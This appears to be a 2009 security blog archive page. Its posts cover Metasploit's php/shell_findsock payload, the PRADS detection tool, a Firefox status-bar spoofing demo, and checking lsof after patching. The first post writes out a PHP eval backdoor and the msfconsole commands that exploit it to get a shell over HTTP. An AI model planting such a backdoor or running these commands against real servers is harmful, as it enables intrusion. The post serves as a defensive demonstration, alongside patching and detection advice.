02.28.09

Spawning a shell on the established connection to the webserver in Metasploit.

Posted in OpenSourceSoftware, Debian, Ubuntu, Security, Metasploit, Back|Track at 9:28 am by Edward Bjarte Fjellskål

A good firewall setup has ingress and egress filtering. On a new setup, I like to set very strict rules for incoming and outgoing traffic. When setting up a new LAMP server etc., making sure it can only connect out to the places it actually needs access to is good security practice. Then open port 80 for connections from the world, minus .ru and .cn etc. :)

So I thought…

Then egypt, from Metasploit, wrote and introduced me to the “php/shell_findsock” payload, which I think is awesome!

If you can get the LAMP server to execute the shell_findsock payload in some way, you can in many cases get a shell over the established HTTP connection! You can also use the payload with other PHP exploits in the framework.

egypt states that “this payload leaves conspicuous evil-looking entries in the apache error logs”, but I did not get any on my Debian Etch test server. On my Ubuntu Intrepid, however, I got:
sh: Syntax error: Bad fd number
and
Invalid method in request exit

egypt also states: “The issue this payload takes advantage of (CLOEXEC flag not set on sockets) appears to have been patched on the Ubuntu version of Apache”
My test on a plain fresh install of Ubuntu 8.10 (Intrepid Ibex) shows that it works.
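As an added check (not from the original post) for the condition egypt describes, the following inspects a running process's socket descriptors through /proc and reports those without the close-on-exec flag, which is what lets a socket survive into a child program; it assumes Linux and read access to /proc/PID/fdinfo (root for another user's process).

```shell
#!/bin/sh
# Added check, not from the original post: does a process still hand its
# sockets to child programs? A socket fd without close-on-exec survives
# exec() into any child the process spawns. Assumes Linux /proc; reading
# another user's fdinfo needs root.

# cloexec_set FLAGS: FLAGS is the "flags:" value from /proc/PID/fdinfo/FD,
# printed by the kernel in octal. Returns 0 if O_CLOEXEC (02000000) is set,
# 1 if the descriptor would be inherited across exec().
cloexec_set() {
  flags=$1
  [ $(( flags & 02000000 )) -ne 0 ]
}

# parse_fdinfo_flags: extract the flags field from fdinfo text on stdin.
parse_fdinfo_flags() {
  awk '$1 == "flags:" { print $2; exit }'
}

# leaky_sockets PID: print "FD socket:[inode]" for every socket descriptor
# of PID that lacks close-on-exec. Prints nothing when the process is clean.
leaky_sockets() {
  pid=$1
  for fd in /proc/"$pid"/fd/*; do
    target=$(readlink "$fd" 2>/dev/null) || continue
    case $target in socket:*) ;; *) continue ;; esac
    n=${fd##*/}
    flags=$(parse_fdinfo_flags < /proc/"$pid"/fdinfo/"$n") || continue
    cloexec_set "$flags" || echo "$n $target"
  done
}

# Usage: inspect an Apache worker, e.g.  leaky_sockets "$(pidof -s apache2)"
```

An empty result for every worker means client sockets are closed on exec and a spawned shell cannot reuse the HTTP connection.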

In the test case, I left my “backdoor” on the server in test.php with the code <?php eval($_GET['evalme']); ?>, which would be the default for this Metasploit setup.
Short version:

msf > use exploit/unix/webapp/php_eval
msf exploit(php_eval) > set PAYLOAD php/shell_findsock
msf exploit(php_eval) > set RHOST www.gamelinux.org
msf exploit(php_eval) > exploit

Screenshot: Metasploit with payload php/shell_findsock

And you thought that you were safe!

On my Debian Etch, the suhosin patch stopped the attack, but not on my Ubuntu Intrepid.

02.19.09

PRADS - Passive Real-time Asset Detection System

Posted in Information, OpenSourceSoftware, Security, PRADS at 12:50 pm by Edward Bjarte Fjellskål

In February 2008, I drafted a document (specs) for a program that I called PPADS back then (Perl Passive Asset Detection System). The program was intended to be a Perl implementation of PADS (Passive Asset Detection System), a program that listens on a network and attempts to provide an up-to-date view of the hosts and services running on it.

My main goal was to use it with Sguil instead of PADS.

In August 2008 I implemented a proof of concept, and then in September Jan Henning Thorsen polished the code, and implemented the part that loads the PADS original service signatures.

The output was now:
(MAC address of the asset that sent the IP packet) source_ip:port -> (MAC address of the asset that is receiving the IP packet) destination_ip:port -> Service identification string

(001f3caedaa9) 87.238.45.168:80 -> (001f3b938df8) 10.10.10.123:42753 -> Apache 2.2.3 Debian

But the initial draft of my document had more… If the service string says Debian… and maybe even Etch… it might even be a Linux server :) So my draft also includes operating system guessing and fingerprinting, like p0f does.

Also, one can look at strings in client communication, etc.:
“Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6 Ubiquity/0.1.5”
“Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6”
So client fingerprinting is also on the road map.

I had some names in my head on what to call the project… It ended up with PRADS - Passive Real-time Asset Detection System.

At the time of writing, PRADS has implemented Service Detection, and a PoC of OS fingerprinting.
I am currently working on loading the original p0f syn-fingerprints and basing the detection on that.

Why am I doing this?
PADS is really cool…
p0f is really cool :)

But they can both be more, and I don’t see a good reason for not implementing such a great thing in one combined program. (And I believe that each time you fire up another “libpcap sniffer” on your sensor, it sucks juice out of your sensor, so if you use the sensor to do IPS/IDS, your total capacity drops.) Also, they seem to lack active development and signature/fingerprint updates.

I am no hardcore C/C++ hacker. Perl is easy and fast :) And I want one agent to “rule them all”… meaning that I want one agent that will give me (and others) insight into what is going on in the network. Not 2,3,4…10…

The project is hosted on GitHub, and people who might be interested in joining the project are welcome :)

My dream right now is to have a GUI that shows you an updated view of what clients (OS and client programs) and servers (OS and services) are running/being used on your network *right now*.

PRADS in Action

Visibility is gold.

02.11.09

Back|Track 4 Beta…

Posted in Information, OpenSourceSoftware, Linux Distributions, Security, Back|Track at 3:01 pm by Edward Bjarte Fjellskål

You probably already know… but… Backtrack 4 Beta was released yesterday to the public…

Read more or download here.

02.06.09

Status Bar Obfuscation / Clickjacking in Firefox

Posted in Information, OpenSourceSoftware, Security at 4:00 pm by Edward Bjarte Fjellskål

I posted this as a test on my site, to show this funky behavior in Firefox to my friends:
http://download.gamelinux.org/code/mozilla/mz.html

It’s modified from MrDoug’s code found on Milw0rm, to be a bit more local (Norway ftw).

It looks like a link to the Norwegian web site of Skandiabanken (an Internet-based bank), but it really isn’t… The status bar will also tell you that the link points to Skandiabanken, but clicking on it will take you to http://www.gamelinux.org/. This is just to demonstrate the bug, and not to harm anyone or anything… It’s harmless :)

I posted it on January 21st 2009, but still (6th of February 2009) my Firefox v3.0.5 (Ubuntu Hardy) + NoScript v1.9.0.1 is acting funky…

Status Bar Obfuscation / Clickjacking in Firefox

Don’t believe what you click!

This is just an awesome hack…

Posted in Information, OpenSourceSoftware, Security at 2:53 pm by Edward Bjarte Fjellskål

I recommend reading this: http://www.myfoxny.com/dpp/news/090202_FBI_Investigates_9_Million_ATM_Scam

Bullet points:
# Major Bank Compromised
# 100 compromised credit cards
# 130 different ATM machines
# 49 cities worldwide
# 30 minutes
# $9,000,000.00 stolen
# Possible leak of sensitive information used in identity theft for a potential 1.5 million customers

They only used 100 cards but they ripped off $9 million in 30 minutes!!!
What about all the sensitive information!!! Once stolen… its stolen!

02.05.09

…and after you upgrade, don’t forget to `lsof`

Posted in Information, OpenSourceSoftware, Linux Distributions, SuSE, Debian, Ubuntu, Redhat, CentOS, Security at 10:12 pm by Edward Bjarte Fjellskål

BTW: Upgrading might not be enough…

After upgrading (up2date, yum, apt, …) my Linux systems, I check with lsof to see if any processes need a restart…

Why?

Because running processes might still be using the old libraries and binaries, etc., and would need a restart to use the new ones…

So… You might be vulnerable, even if you do install security updates regularly…

On older versions of lsof, I used to issue: lsof +L1|grep DEL
This does not seem to be sufficient on newer versions of lsof… Might be a bug?

After searching the web for an easier or better way of doing this, I found little… I did not even find any good info on the way I am used to doing it… If you have a smarter way of checking this, I would love to hear from you…

Here are some references to what I found:
* A bugzilla thread on redhat.com. It also has a script for Red Hat-based systems.
* Debian/Ubuntu-based systems come with debian-goodies… apt-get install debian-goodies and then you can use checkrestart, which checks for programs that need a restart :)

To manually check, here are some commands you can issue, depending on your version of lsof.

# lsof -n +L | grep -w DEL | egrep -v " (/dev|/SYSV|/tmp)"
# lsof -n | grep "path inode="
# lsof -n +L1 | egrep -w "txt|mem" | grep -v " /SYSV"
# lsof -n +L | grep -w DEL | egrep -v " (/dev|/SYSV|/tmp) "
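The same check as a reusable filter, added here and not part of the original post: it applies the txt/mem and (deleted) logic of the one-liners above to lsof output, and falls back to /proc/PID/maps on hosts without lsof. The lsof sample is constructed, and the /proc fallback assumes Linux (root to see other users' processes).

```shell
#!/bin/sh
# Added example, not from the original post: find processes that still map
# executables or libraries deleted by a package upgrade.

# Constructed sample of `lsof -n +L1` output (not captured from a real server).
SAMPLE_LSOF='COMMAND   PID  USER FD   TYPE DEVICE SIZE/OFF NLINK  NODE NAME
apache2  1234  root txt  REG    8,1   437184     0 12345 /usr/sbin/apache2 (deleted)
apache2  1234  root mem  REG    8,1  1404440     0 54321 /lib/libc-2.7.so (deleted)
apache2  1234  root mem  REG    8,1    65536     0 99999 /SYSV00000000 (deleted)
sshd     2222  root txt  REG    8,1   410184     1 11111 /usr/sbin/sshd
bash     3333  root 255u REG    8,1        0     0 22222 /tmp/sh-thd-1234 (deleted)
mysqld   4444 mysql mem  REG    8,1   125000     0 33333 /usr/lib/libssl.so.0.9.8 (deleted)'

# stale_binaries: read `lsof -n +L1` output on stdin and print "PID COMMAND",
# one line per process that still maps a deleted executable (txt) or library
# (mem). SysV shared memory, /dev and /tmp scratch files are unlinked by
# design and are skipped, as in the grep -v filters above.
stale_binaries() {
  awk '$4 ~ /^(txt|mem)$/ && $NF == "(deleted)" && $(NF-1) !~ /^\/(SYSV|tmp|dev)/ { print $2, $1 }' \
    | sort -u
}

# stale_from_proc: same check without lsof, from /proc/PID/maps.
# Prints "PID PATH" for every deleted file-backed mapping.
stale_from_proc() {
  for maps in /proc/[0-9]*/maps; do
    [ -r "$maps" ] || continue
    pid=${maps#/proc/}; pid=${pid%%/*}
    awk -v pid="$pid" '$NF == "(deleted)" && $(NF-1) ~ /^\// && $(NF-1) !~ /^\/(SYSV|tmp|dev|memfd)/ \
      { print pid, $(NF-1) }' "$maps" 2>/dev/null
  done | sort -u
}

# report_stale: run against the live system, preferring lsof when installed.
report_stale() {
  if command -v lsof >/dev/null 2>&1; then
    lsof -n +L1 2>/dev/null | stale_binaries
  else
    stale_from_proc
  fi
}
```

Anything it lists needs a service restart (or a reboot for libc and the kernel) before the upgrade actually protects you.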

Hope you make this check a habit after updating your servers…

02.02.09

Why don’t people install security updates?

Posted in Information, OpenSourceSoftware, Security at 11:18 pm by Edward Bjarte Fjellskål

It just boggles me… Micro$oft released an extraordinary security update, MS08-067, on October 23, 2008…

How come, 2-3 months later, vital machines still get infected?
Read here and here. (In Norwegian)

Some people I talk to claim that the risk of installing such a patch and ending up with unstable servers etc. is a good reason not to patch… (I’m clueless here, so please comment if you have insight into why some don’t patch.) In my world, not patching is not an option…

Well, having been a sysadmin for many years, I say upgrade… Do the least important machines first (or test/staging servers), moving on as you don’t find any issues with the patch… Also… if you can’t trust your OS vendor, who can you trust? And install all updates, relevant or not… or else it will only come back and bite your ass…

That said, the viruses that spread have lots of angles to attack your machines: brute-forcing accounts, automatic updates to be even more up to date on new attack vectors, spreading via portable media, etc… This is not an easy task once you get infected… so look at the risk of installing the patch, and look at all the work that you have to go through cleaning all those systems… which is cheaper?

In my defense, I’m a sysadmin and a taxpayer… so…
Nord-Trøndelag fylkeskommune and Helse Vest: Waste my tax money on being proactive.. not reactive :)